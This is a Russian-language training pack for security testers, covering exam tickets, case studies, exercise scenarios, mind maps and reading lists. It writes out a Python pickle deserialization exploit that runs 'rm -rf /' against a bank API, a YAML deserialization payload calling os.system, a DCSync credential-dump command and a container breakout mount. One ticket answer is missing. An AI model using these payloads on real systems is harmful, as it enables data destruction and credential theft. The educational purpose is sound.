Что такое "Deserialization Attack"?
✅ Ответ:
Эксплуатация уязвимостей в процессах десериализации данных для выполнения произвольного кода. -
Как работает атака "DNS Cache Poisoning"?
✅ Ответ:
Подмена DNS-записей в кэше сервера для перенаправления трафика.
Практическая часть:
Задание: Напишите YAML-конфигурацию для проверки уязвимости десериализации в Python.
✅ Ответ:
test_case:
input: !!python/object/apply:os.system ["whoami"]
expected: "Error"
Билет №9
Теоретическая часть:
-
Объясните принцип работы атаки "Race Condition".
✅ Ответ:
Эксплуатация временного окна между проверкой условия и его использованием. -
Что такое "Side-Channel Attack"?
✅ Ответ:
Атака, использующая побочные каналы информации (время выполнения, энергопотребление).
Практическая часть:
Задание: Напишите скрипт для демонстрации Race Condition.
✅ Ответ:
import os
while True:
try: os.remove("/tmp/test.lock")
except: pass
open("/tmp/test.lock","w").close()
Билет №10
Теоретическая часть:
-
Что такое "Active Directory Attack"?
✅ Ответ:
Комплекс атак на инфраструктуру AD:
-
Pass-the-Hash
-
Golden Ticket
-
DCSync
-
Как защитить Active Directory?
✅ Ответ:
-
Регулярные обновления
-
Мониторинг аномальной активности
-
Ограничение прав доступа
Практическая часть:
Задание: Напишите команду для выполнения DCSync-атаки.
✅ Ответ:
secretsdump.py domain/user:password@dc_ip
Билет №11
Теоретическая часть:
-
Что такое "API Security"?
✅ Ответ:
Меры защиты API от:
-
Неавторизованного доступа
-
Инъекций
-
Чрезмерного потребления ресурсов
-
Какие уязвимости характерны для GraphQL?
✅ Ответ:
-
Introspection-атаки
-
Batch-запросы для DoS
-
Инъекции через аргументы
Практическая часть:
Задание: Напишите запрос для обнаружения introspection в GraphQL.
✅ Ответ:
query { __schema { types { name } } }
Билет №12
Теоретическая часть:
-
Что такое "Cloud Security"?
✅ Ответ:
Защита облачных сред:
-
IAM политики
-
Шифрование данных
-
Мониторинг активности
-
Какие угрозы характерны для AWS S3?
✅ Ответ:
-
Публичный доступ к бакетам
-
Утечки учетных данных
-
Небезопасные ACL
Практическая часть:
Задание: Напишите команду AWS CLI для проверки прав доступа к S3.
✅ Ответ:
Кейс №1: Уязвимость в API интернет-банка
Описание ситуации:
Команда разработала новый REST API для мобильного приложения банка. Функционал позволяет:
-
Просматривать баланс
-
Совершать переводы
-
Управлять шаблонами платежей
Скрытые проблемы:
-
Отсутствие rate-limiting – API не ограничивает количество запросов, что позволяет проводить brute force атак.
-
Информационная утечка – В ответах содержатся технические детали (версии ПО, внутренние IP).
-
Небезопасная десериализация – Параметр
session_data
принимает сериализованные объекты. -
Слабый CORS – Разрешены запросы с любого домена (
Access-Control-Allow-Origin: *
).
Решение:
-
Внедрить лимит запросов (например, 100/мин на IP).
-
Удалить технические данные из ответов.
-
Заменить десериализацию на JSON Web Tokens.
-
Ограничить CORS доверенными доменами.
Пример эксплойта для десериализации (Python):
import requests
import pickle
class Exploit:
def __reduce__(self):
return (eval, ("os.system('rm -rf /')",))
malicious_data = pickle.dumps(Exploit())
requests.post("https://bank.com/api/transfer", json={"session_data": malicious_data})
Кейс №2: Компрометация Docker-контейнера
Описание ситуации:
В компании используют Docker для развертывания веб-приложения. Контейнер включает:
-
Nginx (порт 80)
-
Python-приложение (порт 5000)
-
Базу данных PostgreSQL
Скрытые проблемы:
-
Привилегированный режим – Контейнер запущен с
--privileged
. -
Утечка секретов – Креды к БД хранятся в переменных окружения.
-
Отсутствие AppArmor – Нет профиля безопасности.
-
Устаревший образ – Используется
python:2.7
с известными уязвимостями.
Решение:
-
Запускать контейнер с
--security-opt=no-new-privileges
. -
Использовать Docker Secrets или HashiCorp Vault.
-
Настроить AppArmor профиль:
docker run --security-opt apparmor=docker-default ...
-
Обновить образ до
python:3.11-slim
.
Пример эксплуатации (Breakout):
# Внутри контейнера:
mkdir /mnt/host
mount /dev/sda1 /mnt/host # Получаем доступ к файловой системе хоста
Ролевая игра №1: "Киберучения в корпоративной сети"
Цель:
Отработать навыки реагирования на инциденты и координации между командами.
Формат:
-
Смешанный (очный/онлайн)
-
Продолжительность: 2-3 часа
-
Уровень сложности: Средний
Сеттинг:
Компания "FinSecure" обнаружила подозрительную активность в своей сети:
-
Неизвестные SSH-подключения к серверам
-
Подозрительные исходящие соединения в Tor
Роли:
Роль | Обязанности |
---|---|
Blue Team (3-4 чел.) | Анализ логов, блокировка угроз |
Red Team (2 чел.) | Имитация атак (Pass-the-Hash, Exfiltration) |
SOC-аналитик (1 чел.) | Корреляция событий в SIEM |
CISO (1 чел.) | Принятие решений, отчетность руководству |
Этапы:
-
Обнаружение: Blue Team находит артефакты атаки в логах.
-
Сдерживание: Блокировка IP, изоляция зараженных узлов.
-
Расследование: Анализ памяти, поиск IOC.
-
Восстановление: Патчинг уязвимостей.
Обучающие эффекты:
-
Работа с SIEM (Splunk/ELK)
-
Анализ сетевого трафика (Wireshark)
-
Навыки командной коммуникации
Проблемы:
-
Конфликт между Red/Blue Team из-за нечетких правил
-
Перегрузка SOC ложными срабатываниями
Ролевая игра №2: "Фишинговая атака на компанию"
Цель:
Научить распознавать и предотвращать социальную инженерию.
Формат:
-
Онлайн-симуляция
-
Длительность: 1 неделя (этапный сценарий)
-
Уровень: Начальный
Сеттинг:
Red Team отправляет сотрудникам:
-
Поддельные письма "от HR" с вредоносными вложениями
-
СМС с ссылками на фейковый корпоративный портал
Роли:
Роль | Задачи |
---|---|
Атакующие (2 чел.) | Разработка фишинговых сценариев |
Сотрудники (10+ чел.) | Реакция на письма/СМС |
ИБ-отдел (3 чел.) | Мониторинг почты, обучение коллег |
Этапы:
-
Разведка: Сбор информации о сотрудниках (LinkedIn).
-
Атака: Рассылка писем.
-
Анализ: Статистика кликов по ссылкам.
Обучающие эффекты:
-
Распознавание фишинговых триггеров
-
Навыки отчетности об инцидентах
Вызовы:
-
Этика: сотрудники могут ощущать дискомфорт
-
Ложные срабатывания (например, блокировка легитимных писем)
Ролевая игра №3: "Захват флага в облаке"
Цель:
Отработать пентест облачной инфраструктуры (AWS/GCP).
Формат:
-
CTF-соревнование
-
Время: 4 часа
-
Уровень: Продвинутый
Сеттинг:
Виртуальная облачная среда с уязвимостями:
-
Открытые S3-бакеты
-
Неограниченные IAM-роли
-
Устаревшие EC2-инстансы
Роли:
Роль | Инструменты |
---|---|
Пентестеры (3 чел.) | Pacu, ScoutSuite, Metasploit |
DevOps (2 чел.) | Мониторинг CloudTrail, ответные меры |
Этапы:
-
Разведка: Обнаружение ресурсов.
-
Эксплуатация: Получение доступа к флагам.
-
Эскалация: Захват аккаунта администратора.
Обучающие эффекты:
-
Работа с AWS CLI
-
Понимание политик IAM
Проблемы:
-
Высокий порог входа (требуются знания облачных сервисов)
Ролевая игра №4: "Кризис в больнице: атака на медицинское IoT"
Цель:
Показать риски безопасности в медицинских устройствах.
Формат:
-
Очная симуляция
-
Длительность: 3 часа
-
Уровень: Экспертный
Сеттинг:
Больница использует:
-
Умные инфузионные насосы
-
DICOM-серверы с изображениями
-
Незащищенную Wi-Fi сеть
Роли:
Роль | Действия |
---|---|
Хакеры (2 чел.) | Взлом устройств, шифрование данных |
Врачи (3 чел.) | Работа в условиях сбоев |
Техподдержка (2 чел.) | Восстановление систем |
Этапы:
-
Эксплуатация: Перехват данных с насосов.
-
Кризис: Отказ оборудования в реанимации.
-
Ответные меры: Поиск бэкдоров.
Обучающие эффекты:
-
Понимание уязвимостей IoT
-
Принятие решений в условиях стресса
Вызовы:
-
Эмоциональная нагрузка (медицинский контекст)
1. Карта "Основные направления в тестировании безопасности"
Центральная тема: Профессия "Тестировщик безопасности"
Ветви:
-
Теоретические основы
-
Кибербезопасность
-
Принципы CIA (Confidentiality, Integrity, Availability)
-
Угрозы и уязвимости
-
-
Технические навыки
-
Работа с инструментами (Burp Suite, Nmap, Metasploit)
-
Анализ кода (SAST/DAST)
-
Сетевые протоколы
-
-
Практические сценарии
-
Пентест веб-приложений
-
Аудит мобильных приложений
-
Тестирование API
-
-
Сертификации
-
OSCP
-
CEH
-
CompTIA Security+
-
2. Карта "Этапы тестирования веб-приложений"
Центральная тема: Веб-безопасность
Ветви:
-
Разведка
-
Сбор информации (Whois, DNS)
-
Анализ технологий (Wappalyzer)
-
-
Сканирование
-
Поиск уязвимостей (OWASP ZAP)
-
Автоматизированное тестирование
-
-
Эксплуатация
-
SQL-инъекции
-
XSS/CSRF
-
Небезопасные десериализации
-
-
Отчетность
-
Документирование уязвимостей
-
Рекомендации по исправлению
-
3. Карта "Инструменты тестировщика"
Центральная тема: Инструментарий
Ветви:
-
Для сканирования
-
Nmap
-
OpenVAS
-
Nessus
-
-
Для анализа трафика
-
Wireshark
-
Tcpdump
-
Fiddler
-
-
Для пентеста
-
Metasploit
-
Burp Suite
-
SQLmap
-
-
Для криптоанализа
-
John the Ripper
-
Hashcat
-
4. Карта "Жизненный цикл уязвимости"
Центральная тема: Обнаружение и устранение уязвимостей
Ветви:
-
Обнаружение
-
Ручное тестирование
-
Автоматизированное сканирование
-
-
Верификация
-
Воспроизведение
-
Оценка рисков
-
-
Исправление
-
Патчинг
-
Временные меры
-
-
Мониторинг
-
Повторное тестирование
-
Анализ эффективности исправлений
-
5. Карта "Карьера в безопасности"
Центральная тема: Профессиональное развитие
Ветви:
-
Начальный уровень
-
Junior Penetration Tester
-
SOC Analyst
-
-
Средний уровень
-
Security Engineer
-
Red Team Specialist
-
-
Экспертный уровень
-
Security Architect
-
CISO
-
-
Навыки для роста
-
Программирование (Python, Bash)
-
Понимание сетевых технологий
-
Знание стандартов (ISO 27001, PCI DSS)
-
Как использовать эти карты?
-
Для обучения: Визуализируйте связи между темами.
-
Для планирования: Определяйте слабые места в знаниях.
-
Для повторения: Быстро освежайте ключевые концепции
1. Основной учебник
📘 "Web Application Hacker’s Handbook" – Dafydd Stuttard, Marcus Pinto
-
Описание: Классическое руководство по тестированию веб-приложений с фокусом на OWASP Top 10.
-
Для кого: Для углубленного изучения веб-безопасности (SQLi, XSS, CSRF, SSRF).
-
Формат: Теория + практические примеры.
2. Практическое пособие
📘 "The Art of Exploitation" – Jon Erickson
-
Описание: Книга о низкоуровневых уязвимостях (переполнение буфера, шелл-кодинг).
-
Для кого: Для понимания основ эксплуатации бинарных приложений.
-
Формат: Объяснение на языке C с лабораторными работами.
3. Методическое руководство
📘 "Penetration Testing: A Hands-On Introduction to Hacking" – Georgia Weidman
-
Описание: Пошаговое руководство по пентесту (от разведки до пост-эксплуатации).
-
Для кого: Для начинающих и практикующих специалистов.
-
Формат: Упражнения с Kali Linux.
4. Задачник и кейсы
📘 "RTFM: Red Team Field Manual" – Ben Clark
-
Описание: Справочник команд и техник для Red Team.
-
Для кого: Для быстрого поиска решений во время тестирования.
-
Формат: Компактный формат (Cheat Sheet).
5. Научно-методическое пособие
📘 "Security Engineering" – Ross Anderson
-
Описание: Анализ принципов защиты систем (криптография, аутентификация, безопасность ПО).
-
Для кого: Для понимания фундаментальных концепций.
-
Формат: Академический стиль с примерами.
🔐 Для начинающих:
-
"Основы кибербезопасности: от нуля до первых пентестов"
-
"Введение в Ethical Hacking: как думает хакер"
-
"Безопасность веб-приложений: первые шаги в Bug Bounty"
-
"Практический курс по Kali Linux для новичков"
-
"Как находить уязвимости: SQLi, XSS, CSRF на практике"
💻 Для практикующих тестировщиков:
-
"Продвинутый пентест: взлом сетей и эксплуатация уязвимостей"
-
"Red Team vs Blue Team: симуляция реальных кибератак"
-
"Взлом и защита Active Directory: от теории до практики"
-
"Мобильная безопасность: тестирование iOS и Android-приложений"
-
"API Security: как находить и эксплуатировать уязвимости"
☁️ Для облачных специалистов:
-
"AWS Security: аудит и взлом облачной инфраструктуры"
-
"Kubernetes & Docker: безопасность контейнеров в продакшене"
-
"Cloud Pentesting: от базовых ошибок до сложных атак"
🎯 Для подготовки к сертификациям:
-
"Полный курс OSCP: подготовка с нуля до сертификации"
-
"CEH (Certified Ethical Hacker): разбор всех модулей"
-
"CompTIA Security+: фундамент для старта в cybersecurity"
🚀 Для экспертов:
-
"Эксплуатация 0-day уязвимостей: reverse engineering и фаззинг"
-
"Криптография для хакеров: атаки на алгоритмы шифрования"
-
"Анализ вредоносного ПО (Malware Analysis) с нуля"
-
"Социальная инженерия: искусство взлома человеческого фактора"
📱 Для узких специализаций:
-
"IoT Security: тестирование умных устройств"
-
"Безопасность блокчейна: аудит смарт-контрактов"
-
"Автоматизация пентеста: Python для тестировщиков"
🎓 Для корпоративного обучения:
-
"Кибербезопасность для разработчиков: как писать безопасный код"
-
"Security Awareness: защита бизнеса от фишинга и утечек"
Нет элементов для просмотра